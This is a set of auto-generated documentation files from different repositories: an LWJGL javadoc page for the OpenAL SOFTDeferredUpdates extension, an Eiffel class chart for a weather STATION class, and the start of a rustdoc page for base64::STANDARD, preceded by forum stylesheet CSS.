.author { text-align: center; vertical-align: top; float: left; width: 120px; } .topic .date { text-align: left; vertical-align: top; float: left; } .topic .menu { text-align: right; vertical-align: bottom; padding: 1px 5px; } .topic .text { text-align: justify; vertical-align: top; padding: 5px; min-height: 130px;} .topic .codetitle { } .forum { padding: 5px 0; } .forum .category { background-color: transparent; margin: 5px; padding: 2px 0; min-height: 40px; text-align: left;font-weight: normal; } .forum .cat { float: left; width: 80%; vertical-align: middle;} .forum .description, .forum .description a { text-align: left; font-size: 11px; min-height: 20px; width: 100%; } .forum .icon { text-align: center; width: 7%; float: left; min-height: 40px; } .forum .section-title { text-align: center; width: 100%; height: 25px; font-size: 13px; background-color: transparent; } .forum .section-title a { vertical-align: middle; } .forum .topics { text-align: center; width: 10%; float: right; min-height: 40px; line-height: 40px; } .frrow1 { background-color: transparent; } .frrow2 { background-color: transparent; } .frrow3 { background-color: transparent; } .topics_cat { background-color: transparent; text-align: center; } .topics_list { background-color: transparent; text-align: left; } .adm-prevention { border: 1px solid #333; background-color: transparent; color: red; font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica; font-size: 30px; font-weight: bold; text-align: center;} .mod-prevention { background-color: transparent; color:#81c8d5; font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica; font-size: 30px; font-weight: bold; text-align: center; } .prevention { background-color: transparent; border-top: 1px solid #333; border-bottom: 1px solid #333; border-right: 1px solid #333; padding: 0 10px; } /* Poll ----------------------------- */ .poll { } .poll .question { } .poll .left { background-color: transparent; padding: 1px 5px; } .poll .right { background-color: transparent ; padding: 1px 5px; } /* Sitemap ----------------------------- */ .sitemap { text-indent: 20px; font-size: 12px; } .sitemap .section {} .sitemap .category {} .sitemap .item {} .photo { margin: 10px 0; } /* Progress bar ----------------------------- */ .pass_img#progresbar-2-0, .pass_img#passbar-0 { background:transparent url(../icons/pass_0.gif) no-repeat; height:7px; width:138px; } .pass_img#progresbar-2-10, .pass_img#passbar-10 { background:transparent url(../icons/pass_10.gif) no-repeat; height:7px; width:138px; } .pass_img#progresbar-2-20, .pass_img#passbar-20 { background:transparent url(../icons/pass_20.gif) no-repeat; height:7px; width:138px; } .pass_img#progresbar-2-30, .pass_img#passbar-30 { background:transparent url(../icons/pass_30.gif) no-repeat; height:7px; width:138px; } .pass_img#progresbar-2-40, .pass_img#passbar-40 { background:transparent url(../icons/pass_40.gif) no-repeat; height:7px; width:138px; } .pass_img#progresbar-2-50, .pass_img#passbar-50 { background:transparent url(../icons/pass_50.gif) no-repeat; height:7px; width:138px; } .pass_img#progresbar-2-60, .pass_img#passbar-60 { background:transparent url(../icons/pass_60.gif) no-repeat; height:7px; width:138px; } .pass_img#progresbar-2-70, .pass_img#passbar-70 { background:transparent url(../icons/pass_70.gif) no-repeat; height:7px; width:138px; } .pass_img#progresbar-2-80, .pass_img#passbar-80 { background:transparent url(../icons/pass_80.gif) no-repeat; height:7px; width:138px; } .pass_img#progresbar-2-90, .pass_img#passbar-90 { background:transparent url(../icons/pass_90.gif) no-repeat; height:7px; width:138px; } .pass_img#progresbar-2-100, .pass_img#passbar-100 { background:transparent url(../icons/pass_100.gif) no-repeat; height:7px; width:138px; } /* Advansed Pagination ----------------------------- */ #pagination { padding: 0 0 10px 0; display: block; float: left; } #pagination li { border: 0; margin: 0; font-size: 11px; list-style: none; } #pagination a { padding: 2px 6px; border: 0; margin-right: 2px; } #pagination .title { padding: 2px 6px; display: block; float: left; color: #7f8e91; border: 0; } #pagination .next a, #pagination .previous a { border: solid 1px white; font-weight: bold; } #pagination .active { padding: 2px 6px; display: block; float: left; color: black; font-weight: bold; border: 1px solid #333; background: #81c8d5; } #pagination a:link, #pagination a:visited { display: block; float: left; color: #7f8e91; text-decoration: none; border: 1px solid #333;} #pagination a:hover { border: 1px solid #333; background: #81c8d5; color:black;} /* Rating ----------------------------- */ .star { position: relative; float: right; margin: 3px 0 0 3px; width: 200px; } .star ul.star { position: relative; float: right; margin: 0 40px 0 0; padding: 0; width: 85px; height: 25px; left: 0px; top: -5px; background: url("../icons/stars.gif") repeat-x; cursor: pointer; list-style: none; } .star li { position: absolute; float: right; margin: 0; padding: 0; width: 85px; height: 20px; display: block; text-decoration: none; text-indent: -9000px; z-index: 20; } .star li.curr { background: url("../icons/stars.gif") left 25px; font-size: 1px; } .star div.user { position: relative; float: right; left: 120px; font-size: 13px; font-family: Arial, Consolas, "Segoe UI", Calibri "Trebuchet MS", Helvetica; color: #888; width: 20px; } /* Tabs ----------------------------- */ /*tabs and all content*/ div.tabs { background: transparent; padding: 0; } div.container { width: 100%; margin: 5px 0;} /* text content only*/ div.tabs div { margin: 2px 0; padding: 0; } ul.tabNavigation { list-style:none; margin: 0; padding: 0; text-align: right;} ul.tabNavigation li { display: inline; padding: 0 2px; } /* date links*/ ul.tabNavigation li a { border: 1px solid #333; padding: 0 2px; color: #7f8e91; text-decoration: none; } /* selected date links*/ ul.tabNavigation li a.selected, ul.tabNavigation li a.selected:hover { background: transparent; color: #81c8d5; border: 0; padding: 0 2px; } ul.tabNavigation li a:hover { color: #81c8d5; padding: 0 2px;} ul.tabNavigation li a:focus { outline: 0; padding: 0 2px;} /* Rcms style classes */ .row1 { background-color: #191F1F; color: inherit; } .row2 { background-color: #191F1F; color: inherit; } .row3 { background-color: #101010; color: inherit; }
lib/LWJGL/doc/org/lwjgl/openal/SOFTDeferredUpdates.html
TheOfficialSkara/Game-Engine
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- NewPage --> <html lang="en"> <head> <!-- Generated by javadoc (version 1.7.0_72) on Mon Jul 13 21:12:18 UTC 2015 --> <title>SOFTDeferredUpdates (LWJGL 3.0.0a)</title> <meta name="date" content="2015-07-13"> <link rel="stylesheet" type="text/css" href="../../../javadoc.css" title="Style"> </head> <body> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="SOFTDeferredUpdates (LWJGL 3.0.0a)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-all.html">Index</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../org/lwjgl/openal/SOFTBufferSubData.html" title="class in org.lwjgl.openal"><span class="strong">Prev Class</span></a></li> <li><a href="../../../org/lwjgl/openal/SOFTDirectChannels.html" title="class in org.lwjgl.openal"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../index.html?org/lwjgl/openal/SOFTDeferredUpdates.html" target="_top">Frames</a></li> <li><a href="SOFTDeferredUpdates.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_top"> <li><a href="../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_top"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#field_summary">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field_detail">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">org.lwjgl.openal</div> <h2 title="Class SOFTDeferredUpdates" class="title">Class SOFTDeferredUpdates</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li>java.lang.Object</li> <li> <ul class="inheritance"> <li>org.lwjgl.openal.SOFTDeferredUpdates</li> </ul> </li> </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <hr> <br> <pre>public final class <span class="strong">SOFTDeferredUpdates</span> extends java.lang.Object</pre> <div class="block">Native bindings to the <a href="http://kcat.strangesoft.net/openal-extensions/SOFT_deferred_updates.txt">SOFT_deferred_updates</a> extension. <p>This extension allows applications to defer playback state updates. With unextended OpenAL, the playback state would respond to changes as soon as it could handle them, which makes it effectively impossible to ensure multiple changes occur at the same time without the potential of a "partial" update (where one change is heard without the other). This extension provides a way to prevent state updates from occuring until they've all been done, where they will all apply at once.</p></div> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== FIELD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="field_summary"> <!-- --> </a> <h3>Field Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Field Summary table, listing fields, and an explanation"> <caption><span>Fields</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Field and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>static int</code></td> <td class="colLast"><code><strong><a href="../../../org/lwjgl/openal/SOFTDeferredUpdates.html#AL_DEFERRED_UPDATES_SOFT">AL_DEFERRED_UPDATES_SOFT</a></strong></code> <div class="block">Accepted by the <code>paramName</code> parameter of alGetBoolean, alGetBooleanv (as well as the Integer, Float, and Double variants).</div> </td> </tr> </table> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"> <!-- --> </a> <h3>Method Summary</h3> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Method Summary table, listing methods, and an explanation"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Modifier and Type</th> <th class="colLast" scope="col">Method and Description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>static void</code></td> <td class="colLast"><code><strong><a href="../../../org/lwjgl/openal/SOFTDeferredUpdates.html#alDeferUpdatesSOFT()">alDeferUpdatesSOFT</a></strong>()</code> <div class="block">Sometimes it is desirable to ensure multiple state changes take effect at the same time.</div> </td> </tr> <tr class="rowColor"> <td class="colFirst"><code>static void</code></td> <td class="colLast"><code><strong><a href="../../../org/lwjgl/openal/SOFTDeferredUpdates.html#alProcessUpdatesSOFT()">alProcessUpdatesSOFT</a></strong>()</code> <div class="block">Resumes updates.</div> </td> </tr> <tr class="altColor"> <td class="colFirst"><code>static <a href="../../../org/lwjgl/openal/SOFTDeferredUpdates.html" title="class in org.lwjgl.openal">SOFTDeferredUpdates</a></code></td> <td class="colLast"><code><strong><a href="../../../org/lwjgl/openal/SOFTDeferredUpdates.html#getInstance()">getInstance</a></strong>()</code> <div class="block">Returns the <a href="../../../org/lwjgl/openal/SOFTDeferredUpdates.html" title="class in org.lwjgl.openal"><code>SOFTDeferredUpdates</code></a> instance for the current context.</div> </td> </tr> </table> <ul class="blockList"> <li class="blockList"><a name="methods_inherited_from_class_java.lang.Object"> <!-- --> </a> <h3>Methods inherited from class&nbsp;java.lang.Object</h3> <code>clone, equals, finalize, getClass, hashCode, notify, notifyAll, toString, wait, wait, wait</code></li> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- ============ FIELD DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="field_detail"> <!-- --> </a> <h3>Field Detail</h3> <a name="AL_DEFERRED_UPDATES_SOFT"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>AL_DEFERRED_UPDATES_SOFT</h4> <pre>public static final&nbsp;int AL_DEFERRED_UPDATES_SOFT</pre> <div class="block">Accepted by the <code>paramName</code> parameter of alGetBoolean, alGetBooleanv (as well as the Integer, Float, and Double variants).</div> <dl><dt><span class="strong">See Also:</span></dt><dd><a href="../../../constant-values.html#org.lwjgl.openal.SOFTDeferredUpdates.AL_DEFERRED_UPDATES_SOFT">Constant Field Values</a></dd></dl> </li> </ul> </li> </ul> <!-- ============ METHOD DETAIL ========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="getInstance()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>getInstance</h4> <pre>public static&nbsp;<a href="../../../org/lwjgl/openal/SOFTDeferredUpdates.html" title="class in org.lwjgl.openal">SOFTDeferredUpdates</a>&nbsp;getInstance()</pre> <div class="block">Returns the <a href="../../../org/lwjgl/openal/SOFTDeferredUpdates.html" title="class in org.lwjgl.openal"><code>SOFTDeferredUpdates</code></a> instance for the current context.</div> </li> </ul> <a name="alDeferUpdatesSOFT()"> <!-- --> </a> <ul class="blockList"> <li class="blockList"> <h4>alDeferUpdatesSOFT</h4> <pre>public static&nbsp;void&nbsp;alDeferUpdatesSOFT()</pre> <div class="block">Sometimes it is desirable to ensure multiple state changes take effect at the same time. Normally this isn't possible due to the AL processing updates asychronously, so the playback state can be updated with only part of the changes having been specified. An application can prevent these updates by calling this function. <p>When called, samples will continue to render and be sent to the output device, but the effects of changing playback properties, such as the source or listener gain, or auxiliary slot gain or effect if EFX is supported, among others, will be deferred. Multiple changes can be batched so that they all apply at once at a later time.</p></div> </li> </ul> <a name="alProcessUpdatesSOFT()"> <!-- --> </a> <ul class="blockListLast"> <li class="blockList"> <h4>alProcessUpdatesSOFT</h4> <pre>public static&nbsp;void&nbsp;alProcessUpdatesSOFT()</pre> <div class="block">Resumes updates. <p>Once called, all pending deferred updates will be processed. Any following state changes will also apply as normal.</p></div> </li> </ul> </li> </ul> </li> </ul> </div> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../../../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="../../../deprecated-list.html">Deprecated</a></li> <li><a href="../../../index-all.html">Index</a></li> </ul> </div> <div class="subNav"> <ul class="navList"> <li><a href="../../../org/lwjgl/openal/SOFTBufferSubData.html" title="class in org.lwjgl.openal"><span class="strong">Prev Class</span></a></li> <li><a href="../../../org/lwjgl/openal/SOFTDirectChannels.html" title="class in org.lwjgl.openal"><span class="strong">Next Class</span></a></li> </ul> <ul class="navList"> <li><a href="../../../index.html?org/lwjgl/openal/SOFTDeferredUpdates.html" target="_top">Frames</a></li> <li><a href="SOFTDeferredUpdates.html" target="_top">No Frames</a></li> </ul> <ul class="navList" id="allclasses_navbar_bottom"> <li><a href="../../../allclasses-noframe.html">All Classes</a></li> </ul> <div> <script type="text/javascript"><!-- allClassesLink = document.getElementById("allclasses_navbar_bottom"); if(window==top) { allClassesLink.style.display = "block"; } else { allClassesLink.style.display = "none"; } //--> </script> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> <li>Nested&nbsp;|&nbsp;</li> <li><a href="#field_summary">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_summary">Method</a></li> </ul> <ul class="subNavList"> <li>Detail:&nbsp;</li> <li><a href="#field_detail">Field</a>&nbsp;|&nbsp;</li> <li>Constr&nbsp;|&nbsp;</li> <li><a href="#method_detail">Method</a></li> </ul> </div> <a name="skip-navbar_bottom"> <!-- --> </a></div> <!-- ======== END OF BOTTOM NAVBAR ======= --> <p class="legalCopy"><small><i>Copyright LWJGL. All Rights Reserved. <a href="http://lwjgl.org/license.php">License terms</a>.</i></small></p> </body> </html>
collect/Documentation/msg/station_chart.html
lucapaganotti/eiffel
<HTML> <HEAD> <META NAME="generator" CONTENT="ISE EiffelStudio version 15.01.9.6535 GPL Edition - linux-x86-64"> <meta name="description" content="Summary description for {STATION}."/> <meta name="author" content=""/> <meta name="date" content="$Date$"/> <meta name="keywords" content="Eiffel class"/> <meta name="keywords" content="Eiffel class"/> <TITLE>station Chart</TITLE> <LINK REL="stylesheet" HREF="../default.css" TYPE="text/css"> <SCRIPT TYPE="text/javascript" SRC="../goto.html"></SCRIPT> </HEAD> <BODY> <P ALIGN="CENTER">Automatic generation produced by ISE Eiffel</P> <pre><FORM ONSUBMIT="go_to('../',this.c.value);return false;"> <TABLE CELLSPACING="5" CELLPADDING="4"><TR> <TD CLASS="link1"><A CLASS="link1" HREF="../class_list.html">Classes</A></TD> <TD CLASS="link1"><A CLASS="link1" HREF="../cluster_list.html">Clusters</A></TD> <TD CLASS="link1"><A CLASS="link1" HREF="../cluster_hierarchy.html">Cluster hierarchy</A></TD> <TD CLASS="nolink2">Chart</TD> <TD CLASS="link2"><A CLASS="link2" HREF="station_links.html">Relations</A></TD> <TD CLASS="link2"><A CLASS="link2" HREF="station.html">Text</A></TD> <TD CLASS="link2"><A CLASS="link2" HREF="station_flat.html">Flat</A></TD> <TD CLASS="link2"><A CLASS="link2" HREF="station_short.html">Contracts</A></TD> <TD CLASS="link2"><A CLASS="link2" HREF="station_flatshort.html">Flat contracts</A></TD> <TD CLASS="link2">Go to: <INPUT NAME="c" VALUE="station"></TD> </TR></TABLE></FORM><SPAN CLASS="ekeyword">class</SPAN> <A CLASS="eclass" HREF="../msg/meteo/station_chart.html">STATION</A> <SPAN CLASS="ekeyword">General</SPAN> <SPAN CLASS="eitag">cluster</SPAN><SPAN CLASS="esymbol">:</SPAN> <A CLASS="ecluster" HREF="../msg/meteo/index.html">meteo</A> <SPAN CLASS="eitag">description</SPAN><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="estring">&quot;Summary description for </SPAN><SPAN CLASS="esymbol">{</SPAN><A CLASS="eclass" HREF="../msg/meteo/station_chart.html">STATION</A><SPAN CLASS="esymbol">}</SPAN><SPAN CLASS="estring">.&quot;</SPAN> <SPAN CLASS="eitag">create</SPAN><SPAN CLASS="esymbol">:</SPAN> <A CLASS="efeature" HREF="../msg/meteo/station.html#f_make">make</A> <SPAN CLASS="ekeyword">Ancestors</SPAN> <SPAN CLASS="neclass">ANY</SPAN> <SPAN CLASS="ekeyword">Queries</SPAN> <SPAN TITLE="`address' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_address">address</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">STRING_8</SPAN></SPAN> <SPAN TITLE="`altitude' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_altitude">altitude</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">INTEGER_32</SPAN></SPAN> <SPAN TITLE="`gb_est' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_gb_est">gb_est</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">INTEGER_32</SPAN></SPAN> <SPAN TITLE="`gb_north' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_gb_north">gb_north</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">INTEGER_32</SPAN></SPAN> <SPAN TITLE="`id' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_id">id</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">INTEGER_32</SPAN></SPAN> <SPAN TITLE="`latitude' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_latitude">latitude</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">REAL_32</SPAN></SPAN> <SPAN TITLE="`latitude_degrees' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_latitude_degrees">latitude_degrees</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">INTEGER_32</SPAN></SPAN> <SPAN TITLE="`latitude_minutes' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_latitude_minutes">latitude_minutes</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">INTEGER_32</SPAN></SPAN> <SPAN TITLE="`latitude_seconds' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_latitude_seconds">latitude_seconds</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">REAL_32</SPAN></SPAN> <SPAN TITLE="`longitude' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_longitude">longitude</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">REAL_32</SPAN></SPAN> <SPAN TITLE="`longitude_degrees' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_longitude_degrees">longitude_degrees</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">INTEGER_32</SPAN></SPAN> <SPAN TITLE="`longitude_minutes' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_longitude_minutes">longitude_minutes</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">INTEGER_32</SPAN></SPAN> <SPAN TITLE="`longitude_seconds' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_longitude_seconds">longitude_seconds</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">REAL_32</SPAN></SPAN> <SPAN TITLE="`municipality' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_municipality">municipality</A><SPAN CLASS="esymbol">:</SPAN> <A CLASS="eclass" HREF="../msg/meteo/municipality_chart.html">MUNICIPALITY</A></SPAN> <SPAN TITLE="`name' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_name">name</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">STRING_8</SPAN></SPAN> <SPAN TITLE="`out' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_out">out</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">STRING_8</SPAN></SPAN> <SPAN TITLE="`status' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_status">status</A><SPAN CLASS="esymbol">:</SPAN> <A CLASS="eclass" HREF="../msg/meteo/station_status_chart.html">STATION_STATUS</A></SPAN> <SPAN TITLE="`types' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_types">types</A><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">ARRAYED_LIST</SPAN> <SPAN CLASS="esymbol">[</SPAN><A CLASS="eclass" HREF="../msg/meteo/station_type_chart.html">STATION_TYPE</A><SPAN CLASS="esymbol">]</SPAN></SPAN> <SPAN CLASS="ekeyword">Commands</SPAN> <SPAN TITLE="`set_address' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_set_address">set_address</A> <SPAN CLASS="esymbol">(</SPAN><SPAN CLASS="elocal">an_address</SPAN><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">STRING_8</SPAN><SPAN CLASS="esymbol">)</SPAN></SPAN> <SPAN TITLE="`set_altitude' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_set_altitude">set_altitude</A> <SPAN CLASS="esymbol">(</SPAN><SPAN CLASS="elocal">an_altitude</SPAN><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">INTEGER_32</SPAN><SPAN CLASS="esymbol">)</SPAN></SPAN> <SPAN TITLE="`set_gb_est' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_set_gb_est">set_gb_est</A> <SPAN CLASS="esymbol">(</SPAN><SPAN CLASS="elocal">a_gb_est</SPAN><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">INTEGER_32</SPAN><SPAN CLASS="esymbol">)</SPAN></SPAN> <SPAN TITLE="`set_gb_north' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_set_gb_north">set_gb_north</A> <SPAN CLASS="esymbol">(</SPAN><SPAN CLASS="elocal">a_gb_north</SPAN><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">INTEGER_32</SPAN><SPAN CLASS="esymbol">)</SPAN></SPAN> <SPAN TITLE="`set_id' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_set_id">set_id</A> <SPAN CLASS="esymbol">(</SPAN><SPAN CLASS="elocal">an_id</SPAN><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">INTEGER_32</SPAN><SPAN CLASS="esymbol">)</SPAN></SPAN> <SPAN TITLE="`set_latitude' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_set_latitude">set_latitude</A> <SPAN CLASS="esymbol">(</SPAN><SPAN CLASS="elocal">a_latitude</SPAN><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">REAL_32</SPAN><SPAN CLASS="esymbol">)</SPAN></SPAN> <SPAN TITLE="`set_longitude' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_set_longitude">set_longitude</A> <SPAN CLASS="esymbol">(</SPAN><SPAN CLASS="elocal">a_longitude</SPAN><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">REAL_32</SPAN><SPAN CLASS="esymbol">)</SPAN></SPAN> <SPAN TITLE="`set_municipality' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_set_municipality">set_municipality</A> <SPAN CLASS="esymbol">(</SPAN><SPAN CLASS="elocal">a_municipality</SPAN><SPAN CLASS="esymbol">:</SPAN> <A CLASS="eclass" HREF="../msg/meteo/municipality_chart.html">MUNICIPALITY</A><SPAN CLASS="esymbol">)</SPAN></SPAN> <SPAN TITLE="`set_name' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_set_name">set_name</A> <SPAN CLASS="esymbol">(</SPAN><SPAN CLASS="elocal">a_name</SPAN><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">STRING_8</SPAN><SPAN CLASS="esymbol">)</SPAN></SPAN> <SPAN TITLE="`set_status' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_set_status">set_status</A> <SPAN CLASS="esymbol">(</SPAN><SPAN CLASS="elocal">a_status</SPAN><SPAN CLASS="esymbol">:</SPAN> <A CLASS="eclass" HREF="../msg/meteo/station_status_chart.html">STATION_STATUS</A><SPAN CLASS="esymbol">)</SPAN></SPAN> <SPAN TITLE="`set_types' is declared in `Current'"><A CLASS="efeature" HREF="../msg/meteo/station.html#f_set_types">set_types</A> <SPAN CLASS="esymbol">(</SPAN><SPAN CLASS="elocal">a_type_array</SPAN><SPAN CLASS="esymbol">:</SPAN> <SPAN CLASS="neclass">ARRAY</SPAN> <SPAN CLASS="esymbol">[</SPAN><A CLASS="eclass" HREF="../msg/meteo/station_type_chart.html">STATION_TYPE</A><SPAN CLASS="esymbol">]</SPAN><SPAN CLASS="esymbol">)</SPAN></SPAN> <FORM ONSUBMIT="go_to('../',this.c.value);return false;"> <TABLE CELLSPACING="5" CELLPADDING="4"><TR> <TD CLASS="link1"><A CLASS="link1" HREF="../class_list.html">Classes</A></TD> <TD CLASS="link1"><A CLASS="link1" HREF="../cluster_list.html">Clusters</A></TD> <TD CLASS="link1"><A CLASS="link1" HREF="../cluster_hierarchy.html">Cluster hierarchy</A></TD> <TD CLASS="nolink2">Chart</TD> <TD CLASS="link2"><A CLASS="link2" HREF="station_links.html">Relations</A></TD> <TD CLASS="link2"><A CLASS="link2" HREF="station.html">Text</A></TD> <TD CLASS="link2"><A CLASS="link2" HREF="station_flat.html">Flat</A></TD> <TD CLASS="link2"><A CLASS="link2" HREF="station_short.html">Contracts</A></TD> <TD CLASS="link2"><A CLASS="link2" HREF="station_flatshort.html">Flat contracts</A></TD> <TD CLASS="link2">Go to: <INPUT NAME="c" VALUE="station"></TD> </TR></TABLE></FORM></pre> <P ALIGN="CENTER"> &#045;&#045; Generated by ISE Eiffel &#045;&#045; <BR>For more details: <A HREF="http://www.eiffel.com">www.eiffel.com</A></P> </BODY> </HTML>
docs/doc/rustc_serialize/base64/static.STANDARD.html
TheZoq2/Rust-Scad
<!DOCTYPE html> <html lang="en"> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="generator" content="rustdoc"> <meta name="description" content="API documentation for the Rust `STANDARD` static in crate `rustc_serialize`."> <meta name="keywords" content="rust, rustlang, rust-lang, STANDARD"> <title>rustc_serialize::base64::STANDARD - Rust</title> <link rel="stylesheet" type="text/css" href="../../rustdoc.css"> <link rel="stylesheet" type="text/css" href="../../main.css"> <link rel="shortcut icon" href="https://www.rust-lang.org/favicon.ico"> </head> <body class="rustdoc"> <!--[if lte IE 8]> <div class="warning"> This old browser is unsupported and will most likely display funky things. </div> <![endif]--> <nav class="sidebar"> <a href='../../rustc_serialize/index.html'><img src='https://www.rust-lang.org/logos/rust-logo-128x128-blk-v2.png' alt='logo' width='100'></a> <p class='location'><a href='../index.html'>rustc_serialize</a>::<wbr><a href='index.html'>base64</a></p><script>window.sidebarCurrent = {name: 'STANDARD', ty: 'static', relpath: ''};</script><script defer src="sidebar-items.js"></script> </nav> <nav class="sub"> <form class="search-form js-only"> <div class="search-container"> <input class="search-input" name="search" autocomplete="off" placeholder="Click or press ‘S’ to search, ‘?’ for more options…" type="search"> </div> </form> </nav> <section id='main' class="content 